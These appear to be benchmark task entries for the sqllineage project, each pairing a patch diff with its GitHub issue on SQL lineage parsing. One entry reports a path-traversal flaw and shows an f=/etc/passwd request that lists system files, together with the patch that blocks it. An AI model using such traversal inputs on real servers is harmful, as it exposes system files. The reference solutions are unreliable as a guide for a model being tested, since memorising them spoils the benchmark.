)
select
sq.id
from
(
select
name as user_name,
user_name as id -- backward reference
from
public.src_tbl1
) sq
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
from sqllineage.runner import LineageRunner
with open("test.sql") as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.id <- sq.id <- public.src_tbl1.user_name
```
**Expected behavior**
```
public.tgt_tbl1.id <- sq.id <- public.src_tbl1.name
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
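The backward-reference resolution described here can be illustrated with a small sketch (simplified: a single in-order pass over the select list):

```python
def resolve_lateral_aliases(select_items):
    # select_items: ordered (alias, source_column) pairs, e.g.
    # "select name as user_name, user_name as id" becomes
    # [("user_name", "name"), ("id", "user_name")].
    # A source that matches an earlier alias is a lateral column alias
    # reference and resolves to that alias's real source column.
    resolved = {}
    for alias, source in select_items:
        resolved[alias] = resolved.get(source, source)
    return resolved
```

For the reported SQL, `id` resolves through `user_name` to the real column `name`.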
| This feature is officially called `lateral column alias reference`, see https://aws.amazon.com/about-aws/whats-new/2018/08/amazon-redshift-announces-support-for-lateral-column-alias-reference/
It's not universally supported by every SQL dialects. We will consider adding support but it won't be in high priority.
Tried a few open source SQL database/data warehouse, only sparksql support this feature at the end of 2023.
|dialect|version|support lateral column alias reference|
|---|---|---|
|mysql|8.2.0|no|
|postgres|16.1|no|
|hive|3.1.3|no|
|sparksql|3.5.0|yes|
|trino|435|no|
SparkSQL support was added since [3.4.0](https://spark.apache.org/releases/spark-release-3-4-0.html) via [SPARK-27561](https://issues.apache.org/jira/browse/SPARK-27561), released April 13, 2023. | 2024-01-01T02:57:59 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-514 | 4ac7fde375f597c541c33d549cf1be4140cdaa2e | diff --git a/sqllineage/core/models.py b/sqllineage/core/models.py
index 9101e837..54ae55fe 100644
--- a/sqllineage/core/models.py
+++ b/sqllineage/core/models.py
@@ -147,7 +147,15 @@ def __init__(self, name: str, **kwargs):
"""
self._parent: Set[Union[Path, Table, SubQuery]] = set()
self.raw_name = escape_identifier_name(name)
- self.source_columns = kwargs.pop("source_columns", ((self.raw_name, None),))
+ self.source_columns = (
+ (
+ escape_identifier_name(raw_name),
+ escape_identifier_name(qualifier) if qualifier is not None else None,
+ )
+ for raw_name, qualifier in kwargs.pop(
+ "source_columns", ((self.raw_name, None),)
+ )
+ )
def __str__(self):
return (
diff --git a/sqllineage/core/parser/__init__.py b/sqllineage/core/parser/__init__.py
index 6f1dd25d..73d24af2 100644
--- a/sqllineage/core/parser/__init__.py
+++ b/sqllineage/core/parser/__init__.py
@@ -25,8 +25,7 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
- for idx in range(len(col_grp)):
- tgt_col = col_grp[idx]
+ for idx, tgt_col in enumerate(col_grp):
tgt_col.parent = tgt_tbl
for src_col in tgt_col.to_source_columns(
self.get_alias_mapping_from_table_group(tbl_grp, holder)
| subquery mistakes alias as table name in visualization
**Describe the bug**
The alias of a subquery shows as a Table node in the visualized Table/Column Lineage
**SQL**
```sql
CREATE TABLE main.tab1 AS (
SELECT * FROM (
SELECT T0.* FROM (SELECT * FROM main.tab0) T0 WHERE T0.num < 100
)
)
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
sqllineage -f test.sql --dialect=ansi -g
Web UI (Web User Interface):
<img width="385" alt="alias_table" src="https://github.com/reata/sqllineage/assets/17078500/7110a38e-f4a4-4b85-9074-6b18444c8181">
**Expected behavior**
There should be no table node for alias of subquery.
**Python version (available via `python --version`)**
- 3.10.13
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
| Bug confirmed. Thanks for reporting.
The column lineage is also incorrect in this case. | 2023-12-26T07:59:00 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-510 | c0cf6aa6fc5976a61ed534040b44b21cafb41094 | diff --git a/sqllineage/core/parser/sqlfluff/models.py b/sqllineage/core/parser/sqlfluff/models.py
index 6c603092..921600ea 100644
--- a/sqllineage/core/parser/sqlfluff/models.py
+++ b/sqllineage/core/parser/sqlfluff/models.py
@@ -209,13 +209,9 @@ def _get_column_from_subquery(
def _get_column_from_parenthesis(
sub_segment: BaseSegment,
) -> List[ColumnQualifierTuple]:
- """
- :param sub_segment: segment to be processed
- :return: list of columns and alias from the segment
- """
- col, _ = SqlFluffColumn._get_column_and_alias(sub_segment)
- if col:
- return col
+ # windows function has an extra layer, get rid of it so that it can be handled as regular functions
+ if window_specification := sub_segment.get_child("window_specification"):
+ sub_segment = window_specification
col, _ = SqlFluffColumn._get_column_and_alias(sub_segment, False)
return col if col else []
@@ -223,6 +219,10 @@ def _get_column_from_parenthesis(
def _get_column_and_alias(
segment: BaseSegment, check_bracketed: bool = True
) -> Tuple[List[ColumnQualifierTuple], Optional[str]]:
+ """
+ check_bracketed is True for top-level column definition, like (col1 + col2) as col3
+ set to False for bracket in function call, like coalesce(col1, col2) as col3
+ """
alias = None
columns = []
sub_segments = list_child_segments(segment, check_bracketed)
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 406b17de..c9b732cd 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -48,7 +48,7 @@ def is_subquery(segment: BaseSegment) -> bool:
def is_wildcard(segment: BaseSegment) -> bool:
return segment.type == "wildcard_expression" or (
- segment.type == "symbol" and segment.raw == "*"
+ segment.type == "symbol" and segment.raw == "*" and segment.get_type() == "star"
)
| Misidentify Binary Operator * As Wildcard
```sql
insert into
public.tgt_tbl1
(
id
)
select
nvl(src_tbl1.id, 0) * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
with open(sql_file, 'r') as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.id <- public.src_tbl1.*
public.tgt_tbl1.id <- public.src_tbl1.id
```
**Expected behavior**
```
public.tgt_tbl1.id <- public.src_tbl1.id
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.8
**The lineage of the two variants of SQL is also incorrect.**
```sql
insert into
public.tgt_tbl1
(
id
)
select
coalesce(src_tbl1.id, 0) * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
```sql
insert into
public.tgt_tbl1
(
id
)
select
case when src_tbl1.id is not null then src_tbl1.id else 0 end * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
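The patched check in this record boils down to requiring the parser's own sub-typing of the `*` symbol, which can be sketched as:

```python
def is_wildcard(segment_type: str, raw: str, instance_type: str) -> bool:
    # A bare "*" only counts as a wildcard when the parser typed it as a
    # "star"; a "*" acting as the multiplication operator is excluded.
    return segment_type == "wildcard_expression" or (
        segment_type == "symbol" and raw == "*" and instance_type == "star"
    )
```

So `coalesce(src_tbl1.id, 0) * 1` no longer contributes a phantom `public.src_tbl1.*` edge.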
| Yes this is a bug when binary operator `*` is misidentified as wildcard. We should get it fixed. | 2023-12-24T09:17:38 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-509 | c0cf6aa6fc5976a61ed534040b44b21cafb41094 | diff --git a/sqllineage/cli.py b/sqllineage/cli.py
index e5ff05c0..15b27f2d 100644
--- a/sqllineage/cli.py
+++ b/sqllineage/cli.py
@@ -86,6 +86,11 @@ def main(args=None) -> None:
help="list all the available dialects",
action="store_true",
)
+ parser.add_argument(
+ "--silent_mode",
+ help="skip unsupported statements",
+ action="store_true",
+ )
args = parser.parse_args(args)
if args.e and args.f:
warnings.warn("Both -e and -f options are specified. -e option will be ignored")
@@ -100,6 +105,7 @@ def main(args=None) -> None:
"port": args.port,
"f": args.f if args.f else None,
},
+ silent_mode=args.silent_mode,
)
if args.graph_visualization:
runner.draw(args.dialect)
diff --git a/sqllineage/core/analyzer.py b/sqllineage/core/analyzer.py
index a30ea65e..8f41ffbc 100644
--- a/sqllineage/core/analyzer.py
+++ b/sqllineage/core/analyzer.py
@@ -13,8 +13,10 @@ class LineageAnalyzer:
SUPPORTED_DIALECTS: List[str] = []
@abstractmethod
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool) -> StatementLineageHolder:
"""
to analyze single statement sql and store the result into
- :class:`sqllineage.core.holders.StatementLineageHolder`.
+ :class:`sqllineage.core.holders.StatementLineageHolder`
+
+ :param silent_mode: skip unsupported statements.
"""
diff --git a/sqllineage/core/parser/sqlfluff/analyzer.py b/sqllineage/core/parser/sqlfluff/analyzer.py
index 15af2fc5..e716f3d4 100644
--- a/sqllineage/core/parser/sqlfluff/analyzer.py
+++ b/sqllineage/core/parser/sqlfluff/analyzer.py
@@ -35,7 +35,7 @@ def split_tsql(self, sql: str) -> List[str]:
sqls.append(segment.raw)
return sqls
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool = False) -> StatementLineageHolder:
if sql in self.tsql_split_cache:
statement_segments = [self.tsql_split_cache[sql]]
else:
@@ -56,10 +56,17 @@ def analyze(self, sql: str) -> StatementLineageHolder:
)
return StatementLineageHolder.of(lineage_holder)
else:
- raise UnsupportedStatementException(
- f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
- f"{sql}"
- )
+ if silent_mode:
+ warnings.warn(
+ f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
+ f"{sql}"
+ )
+ return StatementLineageHolder()
+ else:
+ raise UnsupportedStatementException(
+ f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
+ f"{sql}"
+ )
def _list_specific_statement_segment(self, sql: str):
parsed = Linter(dialect=self._dialect).parse_string(sql)
diff --git a/sqllineage/core/parser/sqlparse/analyzer.py b/sqllineage/core/parser/sqlparse/analyzer.py
index 13095f12..ede14f69 100644
--- a/sqllineage/core/parser/sqlparse/analyzer.py
+++ b/sqllineage/core/parser/sqlparse/analyzer.py
@@ -38,7 +38,7 @@ class SqlParseLineageAnalyzer(LineageAnalyzer):
PARSER_NAME = "sqlparse"
SUPPORTED_DIALECTS = ["non-validating"]
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool = False) -> StatementLineageHolder:
# get rid of comments, which cause inconsistencies in sqlparse output
stmt = sqlparse.parse(trim_comment(sql))[0]
if (
diff --git a/sqllineage/runner.py b/sqllineage/runner.py
index e65bce60..e90af884 100644
--- a/sqllineage/runner.py
+++ b/sqllineage/runner.py
@@ -41,6 +41,7 @@ def __init__(
metadata_provider: MetaDataProvider = DummyMetaDataProvider(),
encoding: Optional[str] = None,
verbose: bool = False,
+ silent_mode: bool = False,
draw_options: Optional[Dict[str, str]] = None,
):
"""
@@ -68,6 +69,7 @@ def __init__(
self._stmt: List[str] = []
self._dialect = dialect
self._metadata_provider = metadata_provider
+ self._silent_mode = silent_mode
@lazy_method
def __str__(self):
@@ -190,7 +192,9 @@ def _eval(self):
)
self._stmt = split(self._sql.strip())
- self._stmt_holders = [analyzer.analyze(stmt) for stmt in self._stmt]
+ self._stmt_holders = [
+ analyzer.analyze(stmt, self._silent_mode) for stmt in self._stmt
+ ]
self._sql_holder = SQLLineageHolder.of(
self._metadata_provider, *self._stmt_holders
)
| Silent Mode Option to Suppress UnsupportedStatementException
Currently, when using any dialect other than non-validating (i.e., the sqlfluff parser implementation), SQLLineage needs to know the statement type before analyzing it.
For example, SelectExtractor supports statement types of `["select_statement", "set_expression", "bracketed"]`. And we have a special-purpose NoopExtractor to whitelist a bunch of statement types where no lineage can be extracted.
This whitelist approach solves a problem with the non-validating dialect, where we don't know which statements we support, and when a user reports an exception it's hard to tell whether it's a bug or a missing feature.
However, this comes at the cost that an UnsupportedStatementException will be thrown for any statement type we haven't included in the whitelist. Catching the exception is one way to handle this.
In this proposal we'd also like to introduce a new silent_mode option to emit warnings instead of raising exceptions.
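A self-contained sketch of the proposed control flow (simplified; the real implementation lives in the dialect analyzers):

```python
import warnings

def analyze_statement(stmt_type, supported_types, silent_mode=False):
    # Whitelisted statement types are analyzed; unsupported ones either
    # raise (default) or, in silent mode, emit a warning and produce an
    # empty lineage holder (modeled here as an empty dict).
    if stmt_type in supported_types:
        return {"type": stmt_type}
    if silent_mode:
        warnings.warn(f"unsupported statement type [{stmt_type}]")
        return {}
    raise ValueError(f"unsupported statement type [{stmt_type}]")
```

With silent mode on, an unsupported statement no longer aborts the analysis of the whole script.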
| 2023-12-20T08:02:35 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-503 | fe3e2c5ba1d6d6af2a64a29b4980a97a8d5c83b7 | diff --git a/sqllineage/utils/helpers.py b/sqllineage/utils/helpers.py
index 21f0a268..e403ba79 100644
--- a/sqllineage/utils/helpers.py
+++ b/sqllineage/utils/helpers.py
@@ -45,9 +45,18 @@ def extract_sql_from_args(args: Namespace) -> str:
def split(sql: str) -> List[str]:
# TODO: we need a parser independent split function
import sqlparse
+ from sqlparse.tokens import Punctuation
- # sometimes sqlparse split out a statement that is comment only, we want to exclude that
- return [s.value for s in sqlparse.parse(sql) if s.token_first(skip_cm=True)]
+ result = []
+ for s in sqlparse.parse(sql):
+ if first_token := s.token_first(skip_cm=True):
+ # sometimes sqlparse split out a statement that is comment only or semicolon only, we want to exclude that
+ if first_token.ttype == Punctuation and first_token.value == ";":
+ # exclude semicolon only statement
+ continue
+ else:
+ result.append(s.value)
+ return result
def trim_comment(sql: str) -> str:
| InvalidSyntaxException When SQL Statement Ends with Multiple Semicolons
**Describe the bug**
When a SQL statement ends with multiple semicolons, it will be split into several statements, all of which except the first contain only a semicolon. Those semicolon-only statements trigger InvalidSyntaxException.
**SQL**
Paste the SQL text here. For example:
```sql
SELECT * FROM DUAL;;
```
**To Reproduce**
```shell
sqllineage -f test.sql --dialect=ansi
```
```
Traceback (most recent call last):
File "/home/hujunwei/.pyenv/versions/3.12.0/bin/sqllineage", line 8, in <module>
sys.exit(main())
^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/cli.py", line 109, in main
runner.print_table_lineage()
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 176, in print_table_lineage
print(str(self))
^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 26, in wrapper
self._eval()
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 193, in _eval
self._stmt_holders = [analyzer.analyze(stmt) for stmt in self._stmt]
^^^^^^^^^^^^^^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/core/parser/sqlfluff/analyzer.py", line 42, in analyze
statement_segments = self._list_specific_statement_segment(sql)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/core/parser/sqlfluff/analyzer.py", line 73, in _list_specific_statement_segment
raise InvalidSyntaxException(
sqllineage.exceptions.InvalidSyntaxException: This SQL statement is unparsable, please check potential syntax error for SQL:
;
Line 1, Position 1: Found unparsable section: ';'
```
**Expected behavior**
No exception thrown.
**Python version (available via `python --version`)**
- 3.12.0
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
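A simplified, stdlib-only sketch of the intended split behavior (the merged fix uses sqlparse and also excludes comment-only statements; this naive version ignores semicolons inside string literals):

```python
def split_statements(sql: str) -> list:
    # Split on semicolons and drop statements that are empty or
    # semicolon-only, so "SELECT 1;;" yields exactly one statement.
    return [part.strip() + ";" for part in sql.split(";") if part.strip()]
```

With this filter, `SELECT * FROM DUAL;;` produces a single statement instead of a trailing `;` fragment.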
| 2023-12-11T13:16:04 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-494 | a2b03449ab6d8722eeb3cd9869d89a2af1b7c098 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/base.py b/sqllineage/core/parser/sqlfluff/extractors/base.py
index 74ad8bc6..86c9a535 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/base.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/base.py
@@ -101,6 +101,25 @@ def delegate_to(
"""
return extractor_cls(self.dialect).extract(segment, context)
+ def extract_subquery(
+ self, subqueries: List[SubQuery], holder: SubQueryLineageHolder
+ ):
+ """
+ extract subqueries collected from statement-level segment
+ """
+ from .cte import CteExtractor
+ from .select import SelectExtractor
+
+ for sq in subqueries:
+ extractor_cls = (
+ CteExtractor
+ if sq.query.get_child("with_compound_statement")
+ else SelectExtractor
+ )
+ holder |= extractor_cls(self.dialect).extract(
+ sq.query, AnalyzerContext(cte=holder.cte, write={sq})
+ )
+
@staticmethod
def _init_holder(context: AnalyzerContext) -> SubQueryLineageHolder:
"""
diff --git a/sqllineage/core/parser/sqlfluff/extractors/cte.py b/sqllineage/core/parser/sqlfluff/extractors/cte.py
index 0427a3b0..4356dcd3 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/cte.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/cte.py
@@ -59,11 +59,6 @@ def extract(
if segment_has_alias:
holder.add_cte(SqlFluffSubQuery.of(sub_segment, identifier))
- # By recursively extracting each extractor of the parent and merge, we're doing Depth-first search
- for sq in subqueries:
- holder |= SelectExtractor(self.dialect).extract(
- sq.query,
- AnalyzerContext(cte=holder.cte, write={sq}),
- )
+ self.extract_subquery(subqueries, holder)
return holder
diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index 5c9fe72f..24dcc613 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -70,21 +70,9 @@ def extract(
subqueries.append(sq)
self._handle_table(seg, holder)
self._handle_column(seg)
-
self.end_of_query_cleanup(holder)
- # By recursively extracting each subquery of the parent and merge, we're doing Depth-first search
- for sq in subqueries:
- from .cte import CteExtractor
-
- extractor_cls = (
- CteExtractor
- if sq.query.get_child("with_compound_statement")
- else SelectExtractor
- )
- holder |= extractor_cls(self.dialect).extract(
- sq.query, AnalyzerContext(cte=holder.cte, write={sq})
- )
+ self.extract_subquery(subqueries, holder)
return holder
| CTE (Common Table Expressions) within CTE
**Hope to support CTE (Common Table Expressions) in subqueries. Thank you.**
```sql
insert into
public.tgt_tbl1
(
id
)
with
t1 as
(
with
t2 as
(
select
id
from
public.src_tbl1
)
select
id
from
t2
)
select
id
from
t1
;
```
| https://github.com/reata/sqllineage/issues/476
This potentially will be solved when we solve #476 and #481. Mark it as duplicate and keep it open for now.
#476 (CTE within subquery) is now fixed. But looks like here we have CTE within CTE and they're not handled in a unified way. We still need to fix this issue separately. | 2023-12-10T02:47:40 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-493 | 843ab2eb58e3e8f4d68c5e67afc7f69341c3ade7 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index 72c1eda3..5c9fe72f 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -75,7 +75,14 @@ def extract(
# By recursively extracting each subquery of the parent and merge, we're doing Depth-first search
for sq in subqueries:
- holder |= SelectExtractor(self.dialect).extract(
+ from .cte import CteExtractor
+
+ extractor_cls = (
+ CteExtractor
+ if sq.query.get_child("with_compound_statement")
+ else SelectExtractor
+ )
+ holder |= extractor_cls(self.dialect).extract(
sq.query, AnalyzerContext(cte=holder.cte, write={sq})
)
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index b17c29c4..406b17de 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -36,7 +36,9 @@ def is_subquery(segment: BaseSegment) -> bool:
segment if segment.type == "bracketed" else segment.segments[0]
)
# check if innermost parenthesis contains SELECT
- if token.get_child("select_statement", "set_expression"):
+ if token.get_child(
+ "select_statement", "set_expression", "with_compound_statement"
+ ):
return True
elif expression := token.get_child("expression"):
if expression.get_child("select_statement"):
@@ -152,7 +154,6 @@ def list_subqueries(segment: BaseSegment) -> List[SubQueryTuple]:
elif segment.type == "from_expression_element":
as_segment, target = extract_as_and_target_segment(segment)
if is_subquery(target):
- as_segment, target = extract_as_and_target_segment(segment)
subquery = [
SubQueryTuple(
extract_innermost_bracketed(target)
| lineage inaccurate when CTE used in subquery
```
>>> from sqllineage.runner import LineageRunner
>>> sql_1="""
... with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
... select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
... select names.fname, [nicknames.name](http://nicknames.name/), count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, [nicknames.name](http://nicknames.name/)
... ) as replaceable group by name
... """
>>> sql_2="""
... select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
... with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
... select names.fname, [nicknames.name](http://nicknames.name/), count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, [nicknames.name](http://nicknames.name/)
... ) as replaceable group by name
... """
>>> LineageRunner(sql=sql_1,dialect="redshift").source_tables
[Table: <default>.names, Table: <default>.nicknames]
>>> LineageRunner(sql=sql_2,dialect="redshift").source_tables
[Table: <default>.nicknames]
>>>
```
| Is this the SQL you're using?
```sql
with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
select names.fname, nicknames.name, count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, nicknames.name
) as replaceable group by name;
select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
select names.fname, nicknames.name, count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, nicknames.name
) as replaceable group by name;
```
Because I see markdown syntax like `[nicknames.name](http://nicknames.name/)` in your sql text and it won't parse.
If the SQL is as I pasted above, I can confirm this is a bug and ansi also suffers from the same issue. Looks like we are not handling CTE within subquery. | 2023-12-09T14:41:19 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-492 | 2d912648c14f7010b34026d5a0b1ae53dfe49d9c | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 563851a2..526d7261 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -122,7 +122,11 @@ def delegate_to_cte(
from .cte import CteExtractor
return self.delegate_to(
- CteExtractor, segment, AnalyzerContext(cte=holder.cte, write=holder.write)
+ CteExtractor,
+ segment,
+ AnalyzerContext(
+ cte=holder.cte, write=holder.write, write_columns=holder.write_columns
+ ),
)
def delegate_to_select(
diff --git a/sqllineage/core/parser/sqlfluff/extractors/cte.py b/sqllineage/core/parser/sqlfluff/extractors/cte.py
index f05732dc..0427a3b0 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/cte.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/cte.py
@@ -30,7 +30,11 @@ def extract(
holder |= self.delegate_to(
SelectExtractor,
segment,
- AnalyzerContext(cte=holder.cte, write=holder.write),
+ AnalyzerContext(
+ cte=holder.cte,
+ write=holder.write,
+ write_columns=holder.write_columns,
+ ),
)
elif segment.type == "insert_statement":
holder |= self.delegate_to(
| Not Using Column Name Specified in Query For CTE within Query
**Describe the bug**
* When the column names in the target table are different from those in the source table, the column lineage is incorrect.
**SQL**
Paste the SQL text here. For example:
```sql
insert into
public.tgt_tbl1
(
id
)
with
cte1 as (
select name from public.src_tbl1
)
select
name
from
cte1
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
with open(sql_file, 'r') as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.name <- cte1.name <- public.src_tbl1.name
```
**Expected behavior**
```
public.tgt_tbl1.id <- cte1.name <- public.src_tbl1.name
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.8
| Bug confirmed. Thanks for reporting. | 2023-12-09T13:41:32 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-439 | a896a5ab20ce3540afe4e035310fef5b68b8f788 | diff --git a/sqllineage/drawing.py b/sqllineage/drawing.py
index 0b2599b6..4c6bf1a9 100644
--- a/sqllineage/drawing.py
+++ b/sqllineage/drawing.py
@@ -34,6 +34,7 @@
class SQLLineageApp:
def __init__(self) -> None:
self.routes: Dict[str, Callable[[Dict[str, Any]], Dict[str, Any]]] = {}
+ self.root_path = Path(DATA_FOLDER)
def route(self, path: str):
def wrapper(handler):
@@ -74,6 +75,11 @@ def __call__(self, environ, start_response) -> List[bytes]:
request_body_size = int(environ["CONTENT_LENGTH"])
request_body = environ["wsgi.input"].read(request_body_size)
payload = json.loads(request_body)
+ for param in ["d", "f"]:
+ if param in payload and not str(
+ Path(payload[param]).absolute()
+ ).startswith(str(Path(self.root_path).absolute())):
+ return self.handle_403(start_response)
data = self.routes[path_info](payload)
return self.handle_200_json(start_response, data)
else:
@@ -117,6 +123,12 @@ def handle_400(self, start_response, message) -> List[bytes]:
start_response, HTTPStatus.BAD_REQUEST, message
)
+ def handle_403(self, start_response) -> List[bytes]:
+ message = "File Not Allowed For Accessing"
+ return self.handle_client_error_response(
+ start_response, HTTPStatus.FORBIDDEN, message
+ )
+
def handle_404(self, start_response) -> List[bytes]:
message = "File Not Found"
return self.handle_client_error_response(
@@ -199,6 +211,8 @@ def draw_lineage_graph(**kwargs) -> None:
port = kwargs.pop("port", DEFAULT_PORT)
querystring = urlencode({k: v for k, v in kwargs.items() if v})
path = f"/?{querystring}" if querystring else "/"
+ if "f" in kwargs:
+ app.root_path = Path(kwargs["f"]).parent
with make_server(host, port, app) as httpd:
print(f" * SQLLineage Running on http://{host}:{port}{path}")
httpd.serve_forever()
| Restricting the folders and files a user can access from the frontend
https://reata.github.io/sqllineage/?f=/etc/passwd should not display the whole /etc tree. Contents are not displayed, however :)
Looks a bit like a security issue
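The patch above blocks such requests by resolving the `d`/`f` parameters to absolute paths and checking that they fall under the allowed root folder. A minimal standalone sketch of that containment check, using `Path.resolve()` plus `relative_to` (a slightly stricter variant than the `absolute()`/`startswith` comparison in the patch, since `resolve()` also neutralizes `..` components):

```python
from pathlib import Path

def is_allowed(requested: str, root: str) -> bool:
    # Resolve both paths so that ".." components cannot escape the root folder
    root_abs = Path(root).resolve()
    requested_abs = Path(requested).resolve()
    try:
        # relative_to raises ValueError when requested_abs lies outside root_abs
        requested_abs.relative_to(root_abs)
        return True
    except ValueError:
        return False

print(is_allowed("/tmp/sqllineage/a.sql", "/tmp/sqllineage"))             # True
print(is_allowed("/etc/passwd", "/tmp/sqllineage"))                       # False
print(is_allowed("/tmp/sqllineage/../../etc/passwd", "/tmp/sqllineage"))  # False
```

On Python 3.9+ the `try`/`except` can be replaced by `requested_abs.is_relative_to(root_abs)`.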
| Just seeing /etc/passwd is already kind of scary  ̄︶ ̄
We should definitely limit the `f` parameter to be a subfolder of SQLLINEAGE_DIRECTORY. Thanks for reporting this.
No problem. You should also ban using `..` in the path, just to avoid path traversal completely | 2023-08-27T12:05:22 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-438 | a5ac784cbd3051fcba373a9434ac918a729dbf69 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 1a9b8580..23f0eaf6 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -7,6 +7,7 @@
from sqllineage.core.parser.sqlfluff.models import SqlFluffColumn, SqlFluffTable
from sqllineage.core.parser.sqlfluff.utils import (
get_child,
+ get_children,
is_set_expression,
list_child_segments,
)
@@ -45,6 +46,17 @@ def extract(
holder |= self.delegate_to_cte(segment, holder)
elif segment.type in ("select_statement", "set_expression"):
holder |= self.delegate_to_select(segment, holder)
+ elif segment.type == "values_clause":
+ for bracketed in get_children(segment, "bracketed"):
+ for expression in get_children(bracketed, "expression"):
+ if sub_bracketed := get_child(expression, "bracketed"):
+ if sub_expression := get_child(sub_bracketed, "expression"):
+ if select_statement := get_child(
+ sub_expression, "select_statement"
+ ):
+ holder |= self.delegate_to_select(
+ select_statement, holder
+ )
elif segment.type == "bracketed" and (
self.list_subquery(segment) or is_set_expression(segment)
):
diff --git a/sqllineage/core/parser/sqlparse/analyzer.py b/sqllineage/core/parser/sqlparse/analyzer.py
index 8845810c..46d915dc 100644
--- a/sqllineage/core/parser/sqlparse/analyzer.py
+++ b/sqllineage/core/parser/sqlparse/analyzer.py
